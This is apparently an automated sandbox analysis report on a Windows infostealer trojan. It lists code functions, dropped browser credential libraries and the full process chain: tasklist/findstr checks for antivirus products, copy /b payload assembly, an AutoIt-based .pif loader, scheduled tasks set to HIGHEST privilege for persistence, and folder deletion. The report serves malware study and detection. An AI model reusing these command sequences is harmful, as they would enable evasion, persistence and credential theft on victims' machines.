                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,16_2_00403883
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A55E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,38_2_003A55E5
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_0040497C0_2_0040497C
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_00406ED20_2_00406ED2
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004074BB0_2_004074BB
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0002B02011_2_0002B020
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000294E011_2_000294E0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00029C8011_2_00029C80
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000A81C811_2_000A81C8
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0004232511_2_00042325
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0005643211_2_00056432
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0005258E11_2_0005258E
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0002E6F011_2_0002E6F0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0004275A11_2_0004275A
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000A080211_2_000A0802
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000588EF11_2_000588EF
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000569A411_2_000569A4
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0007EB9511_2_0007EB95
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00030BE011_2_00030BE0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000A0C7F11_2_000A0C7F
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0004CC8111_2_0004CC81
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00088CB111_2_00088CB1
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00056F1611_2_00056F16
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000432E911_2_000432E9
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0004F33911_2_0004F339
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0003D45711_2_0003D457
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0003F57E11_2_0003F57E
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000415E411_2_000415E4
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0002166311_2_00021663
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0002F6A011_2_0002F6A0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000477F311_2_000477F3
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0004DAD511_2_0004DAD5
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00041AD811_2_00041AD8
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00059C1511_2_00059C15
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0003DD1411_2_0003DD14
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00041EF011_2_00041EF0
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0004BF0611_2_0004BF06
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_0040497C16_2_0040497C
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_00406ED216_2_00406ED2
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_004074BB16_2_004074BB
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0034B02038_2_0034B020
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003494E038_2_003494E0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00349C8038_2_00349C80
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003C81C838_2_003C81C8
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0036232538_2_00362325
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0037643238_2_00376432
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0037258E38_2_0037258E
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0034E6F038_2_0034E6F0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0036275A38_2_0036275A
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003C080238_2_003C0802
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003788EF38_2_003788EF
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003769A438_2_003769A4
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0039EB9538_2_0039EB95
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00350BE038_2_00350BE0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003C0C7F38_2_003C0C7F
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A8CB138_2_003A8CB1
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0036CC8138_2_0036CC81
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00376F1638_2_00376F16
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003632E938_2_003632E9
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0036F33938_2_0036F339
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0035D45738_2_0035D457
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0035F57E38_2_0035F57E
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003615E438_2_003615E4
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0034166338_2_00341663
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0034F6A038_2_0034F6A0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003677F338_2_003677F3
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0036DAD538_2_0036DAD5
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00361AD838_2_00361AD8
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00379C1538_2_00379C15
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0035DD1438_2_0035DD14
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00361EF038_2_00361EF0
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0036BF0638_2_0036BF06
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: String function: 00031A36 appears 35 times
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: String function: 00048A60 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: String function: 00040C42 appears 70 times
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: String function: 00368A60 appears 42 times
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: String function: 00351A36 appears 34 times
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: String function: 00360C42 appears 70 times
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: String function: 004062A3 appears 57 times
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: String function: 004062A3 appears 57 times
                    Source: mg9LPWGtPB.exeStatic PE information: invalid certificate
                    Source: mg9LPWGtPB.exe, 00000000.00000002.2030640385.00000000007A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs mg9LPWGtPB.exe
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2014471927.0000000002911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs mg9LPWGtPB.exe
                    Source: mg9LPWGtPB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@64/93@6/7
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008A51A GetLastError,FormatMessageW,11_2_0008A51A
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00078BCC AdjustTokenPrivileges,CloseHandle,11_2_00078BCC
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0007917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_0007917C
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_00398BCC AdjustTokenPrivileges,CloseHandle,38_2_00398BCC
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_0039917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,38_2_0039917C
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00083FB5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_00083FB5
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000842AA __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_000842AA
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199735694209[1].htmJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_03
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeFile created: C:\Users\user\AppData\Local\Temp\nsl9E55.tmpJump to behavior
                    Source: mg9LPWGtPB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                    Source: tasklist.exe, 00000013.00000002.3071451041.0000000002F10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processh=3y;
                    Source: KKFBFC.11.dr, IJECAE.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: mg9LPWGtPB.exeReversingLabs: Detection: 15%
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeFile read: C:\Users\user\Desktop\mg9LPWGtPB.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\mg9LPWGtPB.exe "C:\Users\user\Desktop\mg9LPWGtPB.exe"
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 787041
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SenatorsRamAspectYounger" Boat
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Buffalo + Sims + Imagine 787041\l
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\787041\Hist.pif 787041\Hist.pif 787041\l
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess created: C:\ProgramData\EHIJJDGDHD.exe "C:\ProgramData\EHIJJDGDHD.exe"
                    Source: C:\ProgramData\EHIJJDGDHD.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JDAFIEHIEGDH" & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 661592
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RECEIVEFILLMEDIAEVALUATING" Natural
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Saturn + Demonstrated + Preceding + Eagles + Salon + Grows + Featured 661592\h
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\661592\Bk.pif 661592\Bk.pif 661592\h
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
